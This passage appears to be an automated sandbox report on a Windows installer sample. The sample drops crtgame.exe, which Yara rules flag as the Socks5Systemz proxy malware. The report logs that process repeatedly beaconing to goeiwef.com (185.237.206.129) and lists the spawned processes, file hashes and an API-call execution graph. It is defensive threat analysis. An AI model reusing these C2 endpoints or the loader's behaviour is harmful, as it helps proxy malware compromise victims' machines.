                                                                                          Data Ascii: 214de2fe88e261d4749b96478393969f80739ff0e55824e0ed9e7a692bea52cc1646a7d5bcfd65adc4e43d24e9459f64ae9b0e84f9a539d3801932e88509d823e247242a6243e70c79e6d2c8889db3e5d5a91da02f80fccdb5ead253f1557cb5c21d05efa349d4444b029ebbb1b965f52a3b7a389fcdfa64be2fbb586de20389c14b935e47519a0b975a90bc1b57b9d0aabcd8c394d96bdd12c97e584e205fc43c0522cc534ac9220c9790d4b4d98dcf5d1f2727955253aab62f5b028283da8c57063261be4977a594fa757b6aaf2da3a3f13122144c400d1581156f1171a3c88f4ca7f8c88dd850e4035daaf436ff8fc714897e3558518f70a4c813bcdf1bb3b52e87cd0643568a84af4c50


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.549923185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:55.687473059 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:56.958513021 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.549929185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:57.189357996 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:58.465342999 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.549934185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:58.701899052 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:59.978528023 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.549936185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:09:00.218385935 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:01.493968964 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.549942185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:09:01.739433050 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:03.069195032 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.549947185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:09:03.315077066 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:04.592535973 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.549953185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:09:04.832398891 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:06.108906984 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.549955185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:09:06.351213932 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:07.633358002 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:14:07:00
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Users\user\Desktop\KRdh0OaXqH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\KRdh0OaXqH.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:7'246'011 bytes
                                                                                          MD5 hash:61AB9F06B48B8DF40CE15CE9252C0531
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:1
                                                                                          Start time:14:07:00
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:704'000 bytes
                                                                                          MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:14:07:03
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                                          Imagebase:0xbe0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:14:07:03
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:14:07:03
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                                          Imagebase:0x400000
                                                                                          File size:2'199'540 bytes
                                                                                          MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:14:07:04
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                                          Imagebase:0xb40000
                                                                                          File size:47'104 bytes
                                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:14:07:04
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                                          Imagebase:0x400000
                                                                                          File size:2'199'540 bytes
                                                                                          MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:8
                                                                                          Start time:14:07:04
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:14:07:04
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                                          Imagebase:0x4f0000
                                                                                          File size:139'776 bytes
                                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.2%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:1498
                                                                                            Total number of Limit Nodes:22
                                                                                            execution_graph 4978 409c40 5019 4030dc 4978->5019 4980 409c56 5022 4042e8 4980->5022 4982 409c5b 5025 40457c GetModuleHandleA GetProcAddress 4982->5025 4988 409c6a 5042 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4988->5042 5005 409d43 5104 4074a0 5005->5104 5007 409d05 5007->5005 5137 409aa0 5007->5137 5008 409d84 5108 407a28 5008->5108 5009 409d69 5009->5008 5010 409aa0 4 API calls 5009->5010 5010->5008 5012 409da9 5118 408b08 5012->5118 5016 409def 5017 408b08 21 API calls 5016->5017 5018 409e28 5016->5018 5017->5016 5147 403094 5019->5147 5021 4030e1 GetModuleHandleA GetCommandLineA 5021->4980 5024 404323 5022->5024 5148 403154 5022->5148 5024->4982 5026 404598 5025->5026 5027 40459f GetProcAddress 5025->5027 5026->5027 5028 4045b5 GetProcAddress 5027->5028 5029 4045ae 5027->5029 5030 4045c4 SetProcessDEPPolicy 5028->5030 5031 4045c8 5028->5031 5029->5028 5030->5031 5032 4065b8 5031->5032 5161 405c98 5032->5161 5041 406604 6F541CD0 5041->4988 5043 4090f7 5042->5043 5288 406fa0 SetErrorMode 5043->5288 5048 403198 4 API calls 5049 40913c 5048->5049 5050 409b30 GetSystemInfo VirtualQuery 5049->5050 5051 409be4 5050->5051 5052 409b5a 5050->5052 5056 409768 5051->5056 5052->5051 5053 409bc5 VirtualQuery 5052->5053 5054 409b84 VirtualProtect 5052->5054 5055 409bb3 VirtualProtect 5052->5055 5053->5051 5053->5052 5054->5052 5055->5053 5298 406bd0 GetCommandLineA 5056->5298 5058 409825 5060 4031b8 4 API calls 5058->5060 5059 406c2c 6 API calls 5062 409785 5059->5062 5061 40983f 5060->5061 5064 406c2c 5061->5064 5062->5058 5062->5059 5063 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5063->5062 5065 406c53 GetModuleFileNameA 5064->5065 5066 406c77 GetCommandLineA 5064->5066 5067 403278 4 API calls 5065->5067 5068 406c7c 5066->5068 5069 406c75 5067->5069 5070 406c81 5068->5070 5071 406af0 4 API calls 5068->5071 5074 406c89 5068->5074 5072 406ca4 5069->5072 5073 403198 4 API calls 5070->5073 5071->5068 5075 403198 4 API calls 5072->5075 5073->5074 5076 40322c 4 API calls 5074->5076 5077 406cb9 5075->5077 5076->5072 5078 4031e8 5077->5078 5079 4031ec 5078->5079 5082 4031fc 5078->5082 5081 403254 4 API calls 5079->5081 5079->5082 5080 403228 5084 4074e0 5080->5084 5081->5082 5082->5080 5083 4025ac 4 API calls 5082->5083 5083->5080 5085 4074ea 5084->5085 5319 407576 5085->5319 5322 407578 5085->5322 5086 407516 5087 40752a 5086->5087 5325 40748c GetLastError 5086->5325 5091 409bec FindResourceA 5087->5091 5092 409c01 5091->5092 5093 409c06 SizeofResource 5091->5093 5094 409aa0 4 API calls 5092->5094 5095 409c13 5093->5095 5096 409c18 LoadResource 5093->5096 5094->5093 5097 409aa0 4 API calls 5095->5097 5098 409c26 5096->5098 5099 409c2b LockResource 5096->5099 5097->5096 5100 409aa0 4 API calls 5098->5100 5101 409c37 5099->5101 5102 409c3c 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5102->5007 5134 407918 5102->5134 5103->5102 5105 4074b4 5104->5105 5106 4074c4 5105->5106 5107 4073ec 20 API calls 5105->5107 5106->5009 5107->5106 5109 407a35 5108->5109 5110 405880 4 API calls 5109->5110 5111 407a89 5109->5111 5110->5111 5112 407918 InterlockedExchange 5111->5112 5113 407a9b 5112->5113 5114 405880 4 API calls 5113->5114 5115 407ab1 5113->5115 5114->5115 5116 405880 4 API calls 5115->5116 5117 407af4 5115->5117 5116->5117 5117->5012 5127 408b82 5118->5127 5133 408b39 5118->5133 5119 407cb8 21 API calls 5119->5133 5120 408bcd 5433 407cb8 5120->5433 5121 407cb8 21 API calls 5121->5127 5124 408be4 5126 4031b8 4 API calls 5124->5126 5125 4034f0 4 API calls 5125->5127 5128 408bfe 5126->5128 5127->5120 5127->5121 5127->5125 5131 403420 4 API calls 5127->5131 5132 4031e8 4 API calls 5127->5132 5144 404c10 5128->5144 5129 403420 4 API calls 5129->5133 5130 4031e8 4 API calls 5130->5133 5131->5127 5132->5127 5133->5119 5133->5127 5133->5129 5133->5130 5424 4034f0 5133->5424 5459 4078c4 5134->5459 5138 409ac1 5137->5138 5139 409aa9 5137->5139 5141 405880 4 API calls 5138->5141 5140 405880 4 API calls 5139->5140 5142 409abb 5140->5142 5143 409ad2 5141->5143 5142->5005 5143->5005 5145 402594 4 API calls 5144->5145 5146 404c1b 5145->5146 5146->5016 5147->5021 5149 403164 5148->5149 5150 40318c TlsGetValue 5148->5150 5149->5024 5151 403196 5150->5151 5152 40316f 5150->5152 5151->5024 5156 40310c 5152->5156 5154 403174 TlsGetValue 5155 403184 5154->5155 5155->5024 5157 403120 LocalAlloc 5156->5157 5158 403116 5156->5158 5159 40313e TlsSetValue 5157->5159 5160 403132 5157->5160 5158->5157 5159->5160 5160->5154 5233 405930 5161->5233 5164 405270 GetSystemDefaultLCID 5166 4052a6 5164->5166 5165 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5165->5166 5166->5165 5167 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5166->5167 5168 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5166->5168 5171 405308 5166->5171 5167->5166 5168->5166 5169 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5169->5171 5170 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5170->5171 5171->5169 5171->5170 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5172 5173 40538b 5171->5173 5172->5171 5266 4031b8 5173->5266 5176 4053b4 GetSystemDefaultLCID 5270 4051fc GetLocaleInfoA 5176->5270 5179 4031e8 4 API calls 5180 4053f4 5179->5180 5181 4051fc 5 API calls 5180->5181 5182 405409 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 40542d 5183->5184 5276 405248 GetLocaleInfoA 5184->5276 5187 405248 GetLocaleInfoA 5188 40545d 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405477 5189->5190 5191 405248 GetLocaleInfoA 5190->5191 5192 405494 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 4054ae 5193->5194 5195 4031e8 4 API calls 5194->5195 5196 4054bb 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054d0 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054dd 5199->5200 5201 405248 GetLocaleInfoA 5200->5201 5202 4054eb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 405505 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 405512 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405527 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405534 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405549 5211->5212 5213 405566 5212->5213 5214 405557 5212->5214 5215 40322c 4 API calls 5213->5215 5284 40322c 5214->5284 5217 405564 5215->5217 5218 4051fc 5 API calls 5217->5218 5219 405588 5218->5219 5220 4055a5 5219->5220 5221 405596 5219->5221 5223 403198 4 API calls 5220->5223 5222 40322c 4 API calls 5221->5222 5224 4055a3 5222->5224 5223->5224 5278 4033b4 5224->5278 5226 4055c7 5227 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5226->5227 5228 4055e1 5227->5228 5229 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055fb 5229->5230 5231 405ce4 GetVersionExA 5230->5231 5232 405cfb 5231->5232 5232->5041 5234 40593c 5233->5234 5241 404ccc LoadStringA 5234->5241 5237 4031e8 4 API calls 5238 40596d 5237->5238 5244 403198 5238->5244 5248 403278 5241->5248 5245 4031b7 5244->5245 5246 40319e 5244->5246 5245->5164 5246->5245 5262 4025ac 5246->5262 5253 403254 5248->5253 5250 403288 5251 403198 4 API calls 5250->5251 5252 4032a0 5251->5252 5252->5237 5254 403274 5253->5254 5255 403258 5253->5255 5254->5250 5258 402594 5255->5258 5257 403261 5257->5250 5259 402598 5258->5259 5260 4025a2 5258->5260 5259->5260 5261 403154 4 API calls 5259->5261 5260->5257 5260->5260 5261->5260 5263 4025b0 5262->5263 5265 4025ba 5262->5265 5264 403154 4 API calls 5263->5264 5263->5265 5264->5265 5265->5245 5268 4031be 5266->5268 5267 4031e3 5267->5176 5268->5267 5269 4025ac 4 API calls 5268->5269 5269->5268 5271 405223 5270->5271 5272 405235 5270->5272 5273 403278 4 API calls 5271->5273 5274 40322c 4 API calls 5272->5274 5275 405233 5273->5275 5274->5275 5275->5179 5277 405264 5276->5277 5277->5187 5279 4033bc 5278->5279 5280 403254 4 API calls 5279->5280 5281 4033cf 5280->5281 5282 4031e8 4 API calls 5281->5282 5283 4033f7 5282->5283 5286 403230 5284->5286 5285 403252 5285->5217 5286->5285 5287 4025ac 4 API calls 5286->5287 5287->5285 5296 403414 5288->5296 5291 406fee 5292 407284 FormatMessageA 5291->5292 5293 4072aa 5292->5293 5294 403278 4 API calls 5293->5294 5295 4072c7 5294->5295 5295->5048 5297 403418 LoadLibraryA 5296->5297 5297->5291 5305 406af0 5298->5305 5300 406bf3 5301 406c05 5300->5301 5302 406af0 4 API calls 5300->5302 5303 403198 4 API calls 5301->5303 5302->5300 5304 406c1a 5303->5304 5304->5062 5306 406b1c 5305->5306 5307 403278 4 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 4 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5300 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 4 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 407578 5319->5320 5321 4075b7 CreateFileA 5320->5321 5321->5086 5323 403414 5322->5323 5324 4075b7 CreateFileA 5323->5324 5324->5086 5328 4073ec 5325->5328 5329 407284 5 API calls 5328->5329 5330 407414 5329->5330 5331 407434 5330->5331 5337 405184 5330->5337 5340 405880 5331->5340 5334 407443 5335 403198 4 API calls 5334->5335 5336 407460 5335->5336 5336->5087 5344 405198 5337->5344 5341 405887 5340->5341 5342 4031e8 4 API calls 5341->5342 5343 40589f 5342->5343 5343->5334 5345 4051b5 5344->5345 5352 404e48 5345->5352 5348 4051e1 5350 403278 4 API calls 5348->5350 5351 405193 5350->5351 5351->5331 5355 404e63 5352->5355 5353 404e75 5353->5348 5357 404bd4 5353->5357 5355->5353 5360 404f6a 5355->5360 5367 404e3c 5355->5367 5358 405930 5 API calls 5357->5358 5359 404be5 5358->5359 5359->5348 5361 404f7b 5360->5361 5364 404fc9 5360->5364 5363 40504f 5361->5363 5361->5364 5366 404fe7 5363->5366 5374 404e28 5363->5374 5364->5366 5370 404de4 5364->5370 5366->5355 5368 403198 4 API calls 5367->5368 5369 404e46 5368->5369 5369->5355 5371 404df2 5370->5371 5377 404bec 5371->5377 5373 404e20 5373->5364 5390 4039a4 5374->5390 5380 4059a0 5377->5380 5379 404c05 5379->5373 5381 4059ae 5380->5381 5382 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5381->5382 5383 4059d8 5382->5383 5384 405184 19 API calls 5383->5384 5385 4059e6 5384->5385 5386 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5385->5386 5387 4059f1 5386->5387 5388 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 405a0b 5388->5389 5389->5379 5391 4039ab 5390->5391 5396 4038b4 5391->5396 5393 4039cb 5394 403198 4 API calls 5393->5394 5395 4039d2 5394->5395 5395->5366 5397 4038d5 5396->5397 5398 4038c8 5396->5398 5400 403934 5397->5400 5401 4038db 5397->5401 5399 403780 6 API calls 5398->5399 5404 4038d0 5399->5404 5402 403993 5400->5402 5403 40393b 5400->5403 5405 4038e1 5401->5405 5406 4038ee 5401->5406 5407 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5402->5407 5408 403941 5403->5408 5409 40394b 5403->5409 5404->5393 5410 403894 6 API calls 5405->5410 5411 403894 6 API calls 5406->5411 5407->5404 5412 403864 9 API calls 5408->5412 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5413 5410->5404 5414 4038fc 5411->5414 5412->5404 5415 40395d 5413->5415 5416 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5414->5416 5418 403864 9 API calls 5415->5418 5417 403917 5416->5417 5420 40374c VariantClear 5417->5420 5419 403976 5418->5419 5422 40374c VariantClear 5419->5422 5421 40392c 5420->5421 5421->5393 5423 40398b 5422->5423 5423->5393 5425 4034fd 5424->5425 5431 40352d 5424->5431 5427 403526 5425->5427 5429 403509 5425->5429 5426 403198 4 API calls 5432 403517 5426->5432 5428 403254 4 API calls 5427->5428 5428->5431 5439 4025c4 5429->5439 5431->5426 5432->5133 5434 407cd3 5433->5434 5438 407cc8 5433->5438 5443 407c5c 5434->5443 5437 405880 4 API calls 5437->5438 5438->5124 5440 